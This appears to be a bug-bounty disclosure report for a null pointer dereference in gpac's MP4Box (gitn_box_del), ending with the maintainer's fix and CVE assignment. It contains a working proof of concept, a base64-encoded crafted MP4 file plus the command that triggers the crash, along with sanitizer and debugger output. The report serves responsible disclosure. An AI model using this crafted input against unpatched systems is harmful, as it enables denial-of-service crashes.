NULL Pointer Dereference in gpac/gpac

Valid

Reported on

Jan 31st 2022


Description

Null Pointer Dereference in gitn_box_del

Proof of Concept

echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d > poc

./MP4Box -bt ./poc

Sanitizer output:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==6791==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f32f604f350 bp 0x606000000380 sp 0x7ffec6197280 T0)
==6791==The signal is caused by a READ memory access.
==6791==Hint: address points to the zero page.
    #0 0x7f32f604f350 in gitn_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350)
    #1 0x7f32f606c54d in gf_isom_box_del (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e954d)
    #2 0x7f32f606c32e in gf_isom_box_parse_ex (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e932e)
    #3 0x7f32f606baab in gf_isom_parse_root_box (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1e8aab)
    #4 0x7f32f60747bd in gf_isom_parse_movie_boxes (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f17bd)
    #5 0x7f32f6075ca5 in gf_isom_open_file (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1f2ca5)
    #6 0x4de8fd in mp4boxMain (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x4de8fd)
    #7 0x7f32f5afc0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16    #8 0x429b2d in _start (/home/presler/fuzzing/gpac/bin/gcc/MP4Box+0x429b2d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/presler/fuzzing/gpac/bin/gcc/libgpac.so.10+0x1cc350) in gitn_box_del
==6791==ABORTING

gdb output

gdb ./MP4Box -q
Reading symbols from ./MP4Box...
pwndbg> r -bt ./poc
Starting program: /home/presler/fuzzing/gpac_pure/bin/gcc/MP4Box -bt ./poc
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[iso file] Box "meta" (start 0) has 5 extra bytes
[iso file] Unknown top-level box type 0000

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────── RAX  0x0
 RBX  0x0
 RCX  0x10000100
 RDX  0x3030
 RDI  0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
 RSI  0x7ffff7df51ba ◂— 'no-check'
 R8   0x0
 R9   0x0
 R10  0x7ffff7748e42 ◂— 'gf_isom_box_del'
 R11  0x7ffff7955d40 (gf_isom_box_del) ◂— endbr64
 R12  0x0
 R13  0x6769746e
 R14  0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
 R15  0xffffffec
 RBP  0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
 RSP  0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
 RIP  0x7ffff7936e3f (gitn_box_del+47) ◂— mov    rdi, qword ptr [r8 + rax + 8]
───────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────── ► 0x7ffff7936e3f <gitn_box_del+47>     mov    rdi, qword ptr [r8 + rax + 8]
   0x7ffff7936e44 <gitn_box_del+52>     test   rdi, rdi
   0x7ffff7936e47 <gitn_box_del+55>     je     gitn_box_del+112 <gitn_box_del+112>
    ↓
   0x7ffff7936e80 <gitn_box_del+112>    add    rbx, 1
   0x7ffff7936e84 <gitn_box_del+116>    movzx  eax, dx
   0x7ffff7936e87 <gitn_box_del+119>    cmp    eax, ebx
   0x7ffff7936e89 <gitn_box_del+121>    ja     gitn_box_del+40 <gitn_box_del+40>
    ↓
   0x7ffff7936e38 <gitn_box_del+40>     mov    rax, rbx
   0x7ffff7936e3b <gitn_box_del+43>     shl    rax, 4
   0x7ffff7936e3f <gitn_box_del+47>     mov    rdi, qword ptr [r8 + rax + 8]
   0x7ffff7936e44 <gitn_box_del+52>     test   rdi, rdi
───────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────00:0000│ rsp 0x7fffffff7d40 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
01:0008│     0x7fffffff7d48 —▸ 0x7fffffff7ec0 ◂— 0x0
02:0010│     0x7fffffff7d50 —▸ 0x5555555d22f0 ◂— 0x6769746e /* 'ntig' */
03:0018│     0x7fffffff7d58 —▸ 0x7ffff7955d6c (gf_isom_box_del+44) ◂— test   r12, r12
04:0020│     0x7fffffff7d60 —▸ 0x7fffffff7ec0 ◂— 0x0
05:0028│     0x7fffffff7d68 —▸ 0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
06:0030│     0x7fffffff7d70 ◂— 0x11
07:0038│     0x7fffffff7d78 —▸ 0x7ffff7956570 (gf_isom_box_parse_ex+1888) ◂— cmp    qword ptr [rsp + 8], 0
─────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────── ► f 0   0x7ffff7936e3f gitn_box_del+47
   f 1   0x7ffff7955d6c gf_isom_box_del+44
   f 2   0x7ffff7956570 gf_isom_box_parse_ex+1888
   f 3   0x7ffff7956a30 gf_isom_parse_root_box+64
   f 4   0x7ffff795f17c gf_isom_parse_movie_boxes_internal+236
   f 5   0x7ffff7960907 gf_isom_open_file+311
   f 6   0x55555557f614 mp4boxMain+19444
   f 7   0x7ffff75470b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> bt
#0  0x00007ffff7936e3f in gitn_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#1  0x00007ffff7955d6c in gf_isom_box_del () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10#2  0x00007ffff7956570 in gf_isom_box_parse_ex () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#3  0x00007ffff7956a30 in gf_isom_parse_root_box () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#4  0x00007ffff795f17c in gf_isom_parse_movie_boxes_internal () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#5  0x00007ffff7960907 in gf_isom_open_file () from /home/presler/fuzzing/gpac_pure/bin/gcc/libgpac.so.10
#6  0x000055555557f614 in mp4boxMain ()
#7  0x00007ffff75470b3 in __libc_start_main (main=0x55555556d500 <main>, argc=3, argv=0x7fffffffdd08, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdcf8) at ../csu/libc-start.c:308
#8  0x000055555556d53e in _start ()

Impact

This vulnerability is capable of crashing software, so I think this can be described as DoS.

We are processing your report and will contact the gpac team within 24 hours. 4 months ago
We have contacted a member of the gpac team and are waiting to hear back 4 months ago
gpac/gpac maintainer
4 months ago

Maintainer


https://github.com/gpac/gpac/issues/2092

gpac/gpac maintainer validated this vulnerability 4 months ago
pres1er has been awarded the disclosure bounty
The fix bounty is now up for grabs
gpac/gpac maintainer confirmed that a fix has been merged on 64a2e1 4 months ago
The fix bounty has been dropped
Jamie Slome
4 months ago

Admin


@mantainer - the researcher has requested a CVE for this report. Are you happy for us to go ahead and assign a CVE to this report?

gpac/gpac maintainer
4 months ago

Maintainer


That's ok for us.

Jamie Slome
4 months ago

Admin


Assigned and should be published shortly - thanks! 🎊

to join this conversation